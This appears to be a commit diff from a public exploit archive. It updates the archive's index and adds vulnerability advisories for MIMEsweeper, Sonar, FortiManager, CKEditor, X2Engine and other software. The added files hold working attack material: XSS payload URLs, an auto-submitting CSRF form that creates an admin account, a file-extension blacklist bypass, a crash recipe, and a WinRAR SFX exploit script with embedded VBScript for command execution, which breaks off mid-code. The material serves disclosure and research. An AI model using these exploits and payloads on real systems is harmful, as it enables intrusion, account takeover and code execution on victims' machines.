DB: 2015-09-26

11 new exploits

files.csv

@@ -34095,7 +34095,7 @@ id,file,description,date,author,platform,type,port
 37760,platforms/windows/local/37760.rb,"PDF Shaper 3.5 - Buffer Overflow",2015-08-12,metacom,windows,local,0
 37761,platforms/ios/webapps/37761.txt,"Printer Pro 5.4.3 IOS - Persistent Cross Site Scripting",2015-08-12,"Taurus Omar",ios,webapps,0
 37762,platforms/lin_x86/shellcode/37762.py,"Linux x86 - /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0
-37763,platforms/windows/dos/37763.txt,"NetServe FTP Client 1.0 - Local DOS (Overflow)",2015-08-12,"_ Un_N0n _",windows,dos,0
+37763,platforms/windows/dos/37763.txt,"NetServe FTP Client 1.0 - Local DOS (Overflow)",2015-08-12,Un_N0n,windows,dos,0
 37764,platforms/windows/dos/37764.html,"Internet Explorer CTreeNode::GetCascadedLang Use-After-Free Vulnerability (MS15-079)",2015-08-12,"Blue Frost Security GmbH",windows,dos,0
 37765,platforms/multiple/webapps/37765.txt,"Zend Framework <= 2.4.2 - XML eXternal Entity Injection (XXE) on PHP FPM",2015-08-13,"Dawid Golunski",multiple,webapps,0
 37766,platforms/multiple/dos/37766.py,"Google Chrome <= 43.0 - Certificate MIME Handling Integer Overflow",2015-08-13,"Paulos Yibelo",multiple,dos,0
@@ -34148,7 +34148,7 @@ id,file,description,date,author,platform,type,port
 37807,platforms/php/webapps/37807.txt,"VBulletin 4.1.12 'blog_plugin_useradmin.php' SQL Injection Vulnerability",2012-09-18,Am!r,php,webapps,0
 37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0
 37809,platforms/php/webapps/37809.php,"Nuts CMS Remote PHP Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80
-37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - SEH Overwrite",2015-08-18,"_ Un_N0n _",windows,dos,0
+37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - SEH Overwrite",2015-08-18,Un_N0n,windows,dos,0
 37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 Post Auth RCE",2015-08-18,Ebrietas0,php,webapps,80
 37812,platforms/win32/remote/37812.rb,"Symantec Endpoint Protection Manager Authentication Bypass and Code Execution",2015-08-18,metasploit,win32,remote,8443
 37813,platforms/windows/local/37813.rb,"VideoCharge Studio Buffer Overflow (SEH)",2015-08-18,metasploit,windows,local,0
@@ -34228,7 +34228,7 @@ id,file,description,date,author,platform,type,port
 37890,platforms/windows/local/37890.py,"Multiple ChiefPDF Software 2.0 - Buffer Overflow",2015-08-20,metacom,windows,local,0
 37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343
 37892,platforms/asp/webapps/37892.txt,"Vifi Radio v1 - CSRF Vulnerability",2015-08-20,KnocKout,asp,webapps,80
-37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack-Based Buffer Overflow",2015-08-20,"_ Un_N0n _",windows,dos,21
+37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack-Based Buffer Overflow",2015-08-20,Un_N0n,windows,dos,21
 37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80
 37895,platforms/win64/shellcode/37895.asm,"Win2003 x64 - Token Stealing shellcode - 59 bytes",2015-08-20,"Fitzl Csaba",win64,shellcode,0
 37896,platforms/php/webapps/37896.txt,"WordPress ABC Test Plugin 'id' Parameter Cross Site Scripting Vulnerability",2012-09-26,"Scott Herbert",php,webapps,0
@@ -34276,7 +34276,7 @@ id,file,description,date,author,platform,type,port
 37954,platforms/windows/dos/37954.py,"Mock SMTP Server 1.0 Remote Crash PoC",2015-08-24,"Shankar Damodaran",windows,dos,25
 37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - CSRF Add Admin Exploit",2015-08-24,"Arash Khazaei",php,webapps,80
 37956,platforms/php/webapps/37956.txt,"WordPress GeoPlaces3 Theme - Arbitrary File Upload Vulnerbility",2015-08-24,Mdn_Newbie,php,webapps,80
-37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - (.gas) Crash POC",2015-08-24,"_ Un_N0n _",windows,dos,0
+37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - (.gas) Crash POC",2015-08-24,Un_N0n,windows,dos,0
 37958,platforms/multiple/remote/37958.rb,"Firefox PDF.js Privileged Javascript Injection",2015-08-24,metasploit,multiple,remote,0
 37959,platforms/php/webapps/37959.txt,"BSW Gallery 'uploadpic.php' Arbitrary File Upload Vulnerability",2012-10-18,"cr4wl3r ",php,webapps,0
 37960,platforms/php/webapps/37960.txt,"Amateur Photographer's Image Gallery force-download.php file Parameter Information Disclosure",2012-10-18,"cr4wl3r ",php,webapps,0
@@ -34304,7 +34304,7 @@ id,file,description,date,author,platform,type,port
 37983,platforms/php/webapps/37983.php,"EasyITSP 'customers_edit.php' Authentication Security Bypass Vulnerability",2012-10-26,"Michal Blaszczak",php,webapps,0
 37984,platforms/windows/dos/37984.pl,"KMPlayer 3.0.0.1440 '.avi' File Local Denial of Service Vulnerability",2012-10-26,Am!r,windows,dos,0
 37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80
-37986,platforms/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 Stack Based Buffer Overflow",2015-08-27,"_ Un_N0n _",windows,dos,0
+37986,platforms/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 Stack Based Buffer Overflow",2015-08-27,Un_N0n,windows,dos,0
 37987,platforms/linux/local/37987.py,"FENIX 0.92 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0
 37988,platforms/linux/local/37988.py,"BSIGN 0.4.5 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0
 37989,platforms/php/webapps/37989.txt,"IP.Board 4.X - Stored XSS",2015-08-27,snop,php,webapps,0
@@ -34369,7 +34369,7 @@ id,file,description,date,author,platform,type,port
 38050,platforms/php/webapps/38050.txt,"WordPress Zarzadzonie Kontem Plugin 'ajaxfilemanager.php' Script Arbitrary File Upload Vulnerability",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0
 38051,platforms/php/webapps/38051.txt,"Bedita 3.5.1 - XSS Vulnerabilities",2015-09-01,"Sébastien Morin",php,webapps,80
 38052,platforms/windows/dos/38052.py,"Ricoh DC (SR10) 1.1.0.8 - Denial of Service",2015-09-01,j2x6,windows,dos,21
-38053,platforms/windows/dos/38053.txt,"Mpxplay Multimedia Commander 2.00a - .m3u Stack-Based Buffer Overflow",2015-09-01,"_ Un_N0n _",windows,dos,0
+38053,platforms/windows/dos/38053.txt,"Mpxplay Multimedia Commander 2.00a - .m3u Stack-Based Buffer Overflow",2015-09-01,Un_N0n,windows,dos,0
 38054,platforms/windows/dos/38054.txt,"SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where PoC",2015-09-01,KoreLogic,windows,dos,0
 38055,platforms/windows/dos/38055.txt,"XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write PoC",2015-09-01,KoreLogic,windows,dos,0
 38056,platforms/hardware/webapps/38056.txt,"Edimax BR6228nS/BR6228nC - Multiple Vulnerabilities",2015-09-01,smash,hardware,webapps,80
@@ -34485,7 +34485,7 @@ id,file,description,date,author,platform,type,port
 38182,platforms/php/webapps/38182.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter XSS",2013-01-09,MustLive,php,webapps,0
 38183,platforms/php/webapps/38183.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0
 38184,platforms/php/webapps/38184.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0
-38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - SEH Overwrite Buffer Overflow",2015-09-15,"_ Un_N0n _",windows,local,0
+38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - SEH Overwrite Buffer Overflow",2015-09-15,Un_N0n,windows,local,0
 38186,platforms/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,hardware,remote,0
 38187,platforms/php/webapps/38187.txt,"WordPress CP Reservation Calendar Plugin 1.1.6  - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80
 38188,platforms/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80
@@ -34601,3 +34601,14 @@ id,file,description,date,author,platform,type,port
 38310,platforms/android/remote/38310.c,"Android <= 2.3.5 PowerVR SGX Driver Information Disclosure Vulnerability",2011-11-03,"Geremy Condra",android,remote,0
 38311,platforms/php/webapps/38311.txt,"BlackNova Traders 'news.php' SQL Injection Vulnerability",2013-02-12,ITTIHACK,php,webapps,0
 38312,platforms/php/webapps/38312.txt,"AbanteCart 'index.php' Multiple Cross Site Scripting Vulnerabilities",2013-02-14,LiquidWorm,php,webapps,0
+38313,platforms/multiple/remote/38313.html,"Dell SonicWALL Scrutinizer Multiple HTML Injection Vulnerabilities",2013-02-14,"Benjamin Kunz Mejri",multiple,remote,0
+38314,platforms/php/webapps/38314.txt,"WordPress NextGEN Gallery Plugin Path Disclosure Vulnerability",2013-02-14,"Henrique Montenegro",php,webapps,0
+38315,platforms/php/webapps/38315.txt,"Sonar Multiple Cross Site Scripting Vulnerabilities",2013-02-12,DevilTeam,php,webapps,0
+38316,platforms/cgi/webapps/38316.txt,"FortiManager 5.2.2 - Persistent XSS Vulnerabilities",2015-09-25,hyp3rlinx,cgi,webapps,0
+38317,platforms/windows/dos/38317.txt,"FreshFTP 5.52 - .qfl Crash PoC",2015-09-25,Un_N0n,windows,dos,0
+38318,platforms/asp/webapps/38318.txt,"MIMEsweeper For SMTP Multiple Cross Site Scripting Vulnerabilities",2013-02-18,"Anastasios Monachos",asp,webapps,0
+38319,platforms/windows/local/38319.py,"WinRar 5.21 - SFX OLE Command Execution",2015-09-25,R-73eN,windows,local,0
+38320,platforms/php/webapps/38320.txt,"Squirrelcart 'table' Parameter Cross Site Scripting Vulnerability",2013-02-19,"Gjoko Krstic",php,webapps,0
+38321,platforms/php/webapps/38321.txt,"X2Engine 4.2 - CSRF Vulnerability",2015-09-25,Portcullis,php,webapps,80
+38322,platforms/php/webapps/38322.txt,"CKEditor 'posteddata.php' Cross Site Scripting Vulnerability",2013-02-19,AkaStep,php,webapps,0
+38323,platforms/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,php,webapps,80

platforms/asp/webapps/38318.txt

@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/58012/info
+
+MIMEsweeper for SMTP is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. 
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+MIMEsweeper For SMTP 5.5 is vulnerable; other versions may also be affected.
+
+https://www.example.com/MSWPMM/Common/Reminder.aspx?email=test<script>alert(document.cookie)</script> 
+http://www.example.com/MSWPMM/Common/NewAccount.aspx?email=<script>alert("xss")</script> 
+http://www.example.com/MSWPMM/Common/NewAccount.aspx?ddlCulture=<script>alert("xss")</script> 
+http://www.example.com/MSWPMM/Common/NewAccount.aspx?btnCreateAccount=<script>alert("xss")</script> 
+http://www.example.com/MSWPMM/Common/NewAccount.aspx?btnCancel=<script>alert("xss")</script> 
+http://www.example.com/MSWPMM/Common/SignIn.aspx?tbEmailAddress=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx 
+http://www.example.com/MSWPMM/Common/SignIn.aspx?tbPassword=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx 
+http://www.example.com/MSWPMM/Common/SignIn.aspx?cbAutoSignIn="<script>alert("xss")</script> 
+http://www.example.com/MSWPMM/Common/SignIn.aspx?btnSignIn=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx 
+http://www.example.com/MSWPMM/Common/SignIn.aspx?reason=<script>alert("xss")</script>

platforms/cgi/webapps/38316.txt

@@ -0,0 +1,137 @@
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/AS-FORTIMANAGER-XSS-0924.txt
+
+
+
+Vendor:
+================================
+www.fortinet.com
+
+
+
+Product:
+================================
+FortiManager v5.2.2
+
+FortiManager is a centralized security management appliance that allows you
+to
+centrally manage any number of Fortinet Network Security devices.
+
+
+Vulnerability Type:
+===================
+Multiple Cross Site Scripting ( XSS ) in FortiManager GUI
+http://www.fortiguard.com/advisory/multiple-xss-vulnerabilities-in-fortimanager-gui
+
+
+
+CVE Reference:
+==============
+Pending
+
+
+
+
+
+Vulnerability Details:
+=====================
+
+The Graphical User Interface (GUI) of FortiManager v5.2.2 is
+vulnerable to two reflected Cross-Site Scripting (XSS) vulnerabilities.
+2 potential XSS vectors were identified:
+
+* XSS vulnerability in SOMVpnSSLPortalDialog.
+* XSS vulnerability in FGDMngUpdHistory.
+
+The Graphical User Interface (GUI) of FortiManager v5.2.3 is vulnerable to
+one reflected XSS vulnerability and one stored XSS vulnerability.
+2 potential XSS vectors were identified:
+
+* XSS vulnerability in sharedjobmanager.
+* XSS vulnerability in SOMServiceObjDialog.
+
+Affected Products
+
+XSS items 1-2: FortiManager v5.2.2 or earlier.
+XSS items 3-4: FortiManager v5.2.3 or earlier.
+
+
+Solutions:
+===========
+No workarounds are currently available.
+Update to FortiManager v5.2.4.
+
+
+Exploit code(s):
+===============
+
+1- Persistent:
+https://localhost/cgi-bin/module/sharedobjmanager/firewall/SOMServiceObjDialog?devGrpId=18446744073709551615&deviceId=18446744073709551615&vdom=&adomId=3&vdomID=0&adomType=ems&cate=167&prodId=0&key=ALL&catetype=167&cate=167&permit_w=1&roid=189&startIndex=0&results=50
+
+<div class="ui-comments-div"><textarea  id="_comp_15" name="_comp_15"
+class="ui-comments-text" cols="58" maxlength="255"
+ maxnum="255" placeholder="Write a comment"
+rows="1"><script>alert(666)</script>&lt;/textarea&gt;<label
+class="ui-comments-remaining">
+
+
+2- Reflected
+https://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable?vdom=%22%27/%3E%3C/script%3E%3Cscript%3Ealert%28%27[XSS%20FortiManager%20POC%20VM64%20v5.2.2%2008042015%20]\n\n%27%2bdocument.cookie%29%3C/script%3E
+<https://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable?vdom=%22%27/%3E%3C/script%3E%3Cscript%3Ealert%28%27[XSS%20FortiManager%20POC%20VM64%20v5.2.2%2008042015%20]%5Cn%5Cn%27%2bdocument.cookie%29%3C/script%3E>
+
+
+
+Disclosure Timeline:
+=========================================================
+Vendor Notification:  August 4, 2015
+September 24, 2015 : Public Disclosure
+
+
+
+
+Exploitation Technique:
+=======================
+Remote & Local
+
+
+
+Severity Level:
+=========================================================
+Medium (3)
+
+
+
+
+Description:
+==========================================================
+
+
+Request Method(s):              [+] GET
+
+
+Vulnerable Product:             [+] FortiManager v5.2.2  & v5.2.3 or earlier
+
+
+Vulnerable Parameter(s):        [+] vdom, textarea field
+
+
+Affected Area(s):               [+] sharedobjmanager, SOMServiceObjDialog
+
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx

platforms/jsp/webapps/37272.txt

@@ -31,7 +31,7 @@ SQL Injection & Persistent XSS
 
 Vulnerability Details:
 ======================
-SQL Injection:
+SQL Injection (CVE-2015-7346):
 Login to admin area requires a password but is easily bypassed
 using classic SQLInjection method because application uses
 concatenated user input to construct SQL queries.
@@ -56,7 +56,7 @@ subverting
 all character filtering leveraging existing SQLInjection vulnerabilities.
 
 
-Persistent XSS:
+Persistent XSS (CVE-2015-7347):
 ===============
 
 Another persistent XSS vector is here in author field for comments:

platforms/php/webapps/38314.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/57957/info
+
+The NextGEN Gallery plugin for WordPress is prone to a path-disclosure vulnerability. 
+
+An attacker can exploit this issue to obtain sensitive information that may lead to further attacks. 
+
+NextGEN Gallery versions 1.9.10 and 1.9.11 are vulnerable; other versions may also be affected.
+
+http://www.example.com/?callback=json&api_key=true&format=json&method=gallery&id=1 
+
+http://www.example.com/?callback=json&api_key=true&format=xml&method=recent&limit=1

platforms/php/webapps/38315.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/57982/info
+
+Sonar is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. 
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+Sonar 3.4.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/dependencies/index?search="><script>alert(/devilteam.pl/)</script> 
+
+http://www.example.com/dashboard/index/41730?did=4&period=3"><script>alert(/devilteam.pl/)</script> 
+
+http://www.example.com/reviews/index?review_id=&statuses[]=OPEN&statuses[]=REOPENED&severities[]=&projects[]=&amp;author_login=&assignee_login="><script>alert(/devilteam.pl/)</script>&false_positives=without&sort=&asc=false&commit=Search
+
+http://www.example.com/reviews/index?review_id=&statuses[]=OPEN&statuses[]=REOPENED&severities[]=&projects[]=&amp;author_login="><script>alert(/devilteam.pl/)</script>&assignee_login=&false_positives=without&sort=&asc=false&commit=Search
+
+http://www.example.com/api/sources?resource=<script>alert(/devilteam.pl/)</script>&format=txt

platforms/php/webapps/38320.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/58025/info
+
+Squirrelcart is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. 
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/index.php?show_record_links=1&table=Products"><script>alert(251);</script>&add_new_item=1

platforms/php/webapps/38321.txt

@@ -0,0 +1,68 @@
+Source: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5075/
+
+Details:
+It was discovered that no protection against Cross-site Request Forgery attacks was implemented, resulting in an attacker being able to able to force the creation of a new administrative account.
+
+Impact:
+Cross-site Request Forgery exploits the way in which HTTP and web browsers work.
+
+Due to the fact that HTTP is a stateless protocol, and that web browsers will include all relevant cookies for the domain that a request is for, if an administrator user was logged into the application and the attacker sent a link that the administrator duly followed (or the attacker tricked them into following a link on a page), the administrator’s browser would include all cookies (including the session cookies) in the request. The attacker’s link would then be executed with administrator privileges.
+
+This attack is not limited to sending malicious URLs to users; multiple different attack vectors exist to perform this attack in a more covert manner, such as embedding the attack within an invisible iFrame on a different page. Using the iFrame method it is also possible to submit both GET and POST requests.
+
+For example:
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+    <form action="http://localhost/x2engine/index.php/users/create" method="POST">
+      <input type="hidden" name="User&#91;firstName&#93;" value="John" />
+      <input type="hidden" name="User&#91;lastName&#93;" value="Smith" />
+      <input type="hidden" name="User&#91;username&#93;" value="adm1n" />
+      <input type="hidden" name="User&#91;password&#93;" value="letmein" />
+      <input type="hidden" name="User&#91;userKey&#93;" value="" />
+      <input type="hidden" name="User&#91;title&#93;" value="" />
+      <input type="hidden" name="User&#91;department&#93;" value="" />
+      <input type="hidden" name="User&#91;officePhone&#93;" value="" />
+      <input type="hidden" name="User&#91;cellPhone&#93;" value="" />
+      <input type="hidden" name="User&#91;homePhone&#93;" value="" />
+      <input type="hidden" name="User&#91;address&#93;" value="" />
+      <input type="hidden" name="User&#91;backgroundInfo&#93;" value="" />
+      <input type="hidden" name="User&#91;emailAddress&#93;" value="" />
+      <input type="hidden" name="User&#91;status&#93;" value="1" />
+      <input type="hidden" name="yt0" value="Create" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+Exploit:
+Exploit code is not required.
+
+Remediation:
+The vendor has released a patch.
+
+Vendor status:
+15/09/2014	Submitted initial contact via web form on X2Engine’s page
+30/09/2014	Second initial contact message sent via web form
+08/12/2014	Final chaser sent via their web form
+20/01/2015	Automated response from the X2 website received on 08/12/2014. Attempting to contact the email address that it was sent from “john@x2engine.com”. If no response by the end of the week will start forced disclosure process
+21/01/2015	Initial vendor response, details over vulnerability sent
+26/02/2015	Chaser sent to vendor
+17/04/2015	Second chaser sent to vendor
+08/06/2015	Chaser sent to vendor. Unsure if his emails are getting through to us as he stated that he has been replying
+08/06/2015	Vendor responded stating that they needed vuln details even though I had sent them months ago
+09/06/2015	Vendor is approximately 75% through fix and will have a patch out within the next few weeks
+26/06/2015	MITRE assigned CVE-2015-5075
+13/07/2015	Vendor asked for CVEs to add to their page. Should be ready for publish soon when they have given their clients time to patch
+22/07/2015	Email from vendor stating that they released the fix for this on 13/07/2015 and asked when we would be disclosing
+23/07/2015	Vendor has asked if we wait off until they release their next major update (At some point in the next 2 weeks). Confirmed this is fine and to contact us when they have a release date confirmed for it
+24/08/2015	Replied to the vendor
+26/08/2015	Vendor confirmed that they are ready for us to publish
+18/09/2015	Published
+
+Copyright:
+Copyright © Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
+
+Disclaimer:
+The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

platforms/php/webapps/38322.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/58045/info
+
+CKEditor is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. 
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+CKEditor 4.0.1 is vulnerable; other versions may also be affected.
+
+<body onload="javascript:document.forms[0].submit()">
+<form name="form1" method="post" action="http://www.example.com/admin/ckeditor/samples/sample_posteddata.php" enctype="multipart/form-data">
+<input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF"></li>
+</form>

platforms/php/webapps/38323.txt

@@ -0,0 +1,42 @@
+Source: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5074/
+
+Details:
+It was discovered that authenticated users were able to upload files of any type providing that the file did not have an extension that was listed in the following blacklist:
+
+ const EXT_BLACKLIST = '/\.\s*(?P<ext>html|htm|js|jsb|mhtml|mht|xhtml|xht|php|phtml|php3|php4|php5|phps|shtml|jhtml|pl|py|cgi|exe|scr|dll|msi|vbs|bat|com|pif|cmd|vxd|cpl|ini|conf|cnf|key|iv|htaccess)\b/i';
+However, there is another common (not present in regexp) that allow PHP execution: .PHT. It is therefore possible to execute any PHP code on the remote system.
+
+Impact:
+Permitting the uploading of arbitrary files could result in highly damaging content such as malware, indecent images, viruses and/or pirated software being uploaded and stored, and later downloaded. In addition, the storage of such material could quite possibly have serious legal implications for the hosting organisation.
+
+In this case, an attacker could exploit the functionality to upload server scripts which, when requested by a browser, would execute code on the server.
+
+Exploit:
+Exploit code not required.
+
+Remediation:
+The vendor has released a patch however it is also possible to add new extensions such as PHT to the existing blacklist.
+Vendor status:
+15/09/2014	Submitted initial contact via web form on X2Engine’s page
+30/09/2014	Second initial contact message sent via web form
+08/12/2014	Final chaser sent via their web form
+20/01/2015	Automated response from the X2 website received on 08/12/2014. Attempting to contact the email address that it was sent from “john@x2engine.com”. If no response by the end of the week will start forced disclosure process
+21/01/2015	Initial vendor response, details over vulnerability sent
+26/02/2015	Chaser sent to vendor
+17/04/2015	Second chaser sent to vendor
+08/06/2015	Chaser sent to vendor. Unsure if his emails are getting through to us as he stated that he has been replying
+08/06/2015	Vendor responded stating that they needed vulnerability details even though I had sent them months ago
+09/06/2015	Vendor is approximately 75% through fix and will have a patch out within the next few weeks
+26/06/2015	MITRE assigned CVE-2015-5074
+13/07/2015	Vendor asked for CVEs to add to their page. Should be ready for publish soon when they have given their clients time to patch
+22/07/2015	Email from vendor stating that they released the fix for this on 13/07/2015 and asked when we would be disclosing
+23/07/2015	Vendor has asked if we wait off until they release their next major update (At some point in the next 2 weeks). Confirmed this is fine and to contact us when they have a release date confirmed for it
+24/08/2015	Replied to the vendor
+26/08/2015	Vendor confirmed that they are ready for us to publish
+18/09/2015	Published
+
+Copyright:
+Copyright © Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
+
+Disclaimer:
+The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

platforms/windows/dos/38317.txt

@@ -0,0 +1,30 @@
+********************************************************************************************
+# Exploit Title: FreshFTP .QFL Local DOS(While Parsing).
+# Date: 9/15/2015
+# Exploit Author: Un_N0n
+# Software Vendor : http://www.freshwebmaster.com/
+# Software Link: http://www.freshwebmaster.com/download.html
+# Version: 5.52
+# Tested on: Windows 7 x86(32 BIT)
+********************************************************************************************
+
+[Steps to Produce the Crash]:
+1- Goto Directory in which freshftp is installed.
+2- create a file "Test.QFL"
+3- paste in the following contents in it:
+'''
+	FFD
    QUEUE    «AJ»
+	AAAAA....upto 66666(bigger the file, more the resource usage)
+'''
+4- Save the file.
+5- open freshftp.exe
+6- When freshftp is started it looks for QFL file to load it, in this case, freshFTP suffers a 
+   DOS condition due to unexpected format of the QFL file.
+7- there is another case, sometimes freshftp won't load QFL on the startup, so to perform DOS
+   in this case, goto Queue-> Open Queue -> Browse the QFL file, DOS Condition occurs.
+8- At the next startup, freshFTP will look for QFL file before starting therefore DOS condition
+   again.
+   
+This DOS condition leads to very high CPU Usage as well as RAM usage which can harm your system
+so test carefully.
+***********************************************************************************************

platforms/windows/local/38319.py

@@ -0,0 +1,249 @@
+#!/usr/bin/python -w
+# Title : WinRar SFX OLE Command Execution
+# Date : 25/09/2015
+# Author : R-73eN
+# Tested on : Windows Xp SP3 with WinRAR 5.21
+#
+# Triggering the Vulnerability
+# Run this python script
+# Right click a file and then click on add to archive.
+# check the 'Create SFX archive' box
+# go to Advanced tab
+# go to SFX options
+# go to Text And icon
+# copy the code that the script will generate to 'Text to display into sfx windows'
+# Click OK two times and the sfx archive is generated.
+# If someone opens that sfx archive a calculator should pop up.
+#
+# Video : https://youtu.be/vIslLJYvnaM
+#
+
+banner = ""
+banner +="  ___        __        ____                 _    _  \n" 
+banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
+banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
+banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
+banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
+print banner
+
+import socket
+
+CRLF = "\r\n"
+#OLE command execution
+exploit = """<html>
+<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
+<head>
+</head>
+<body>
+ 
+<SCRIPT LANGUAGE="VBScript">
+
+function runmumaa() 
+On Error Resume Next
+set shell=createobject("Shell.Application")
+shell.ShellExecute "calc.exe", "runas", 0
+end function
+</script>
+ 
+<SCRIPT LANGUAGE="VBScript">
+  
+dim   aa()
+dim   ab()
+dim   a0
+dim   a1
+dim   a2
+dim   a3
+dim   win9x
+dim   intVersion
+dim   rnda
+dim   funclass
+dim   myarray
+ 
+Begin()
+ 
+function Begin()
+  On Error Resume Next
+  info=Navigator.UserAgent
+ 
+  if(instr(info,"Win64")>0)   then
+     exit   function
+  end if
+ 
+  if (instr(info,"MSIE")>0)   then 
+             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
+  else
+     exit   function  
+              
+  end if
+ 
+  win9x=0
+ 
+  BeginInit()
+  If Create()=True Then
+     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
+     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
+ 
+     if(intVersion<4) then
+         document.write("<br> IE")
+         document.write(intVersion)
+         runshellcode()                    
+     else  
+          setnotsafemode()
+     end if
+  end if
+end function
+ 
+function BeginInit()
+   Randomize()
+   redim aa(5)
+   redim ab(5)
+   a0=13+17*rnd(6)
+   a3=7+3*rnd(5)
+end function
+ 
+function Create()
+  On Error Resume Next
+  dim i
+  Create=False
+  For i = 0 To 400
+    If Over()=True Then
+       Create=True
+       Exit For
+    End If 
+  Next
+end function
+ 
+sub testaa()
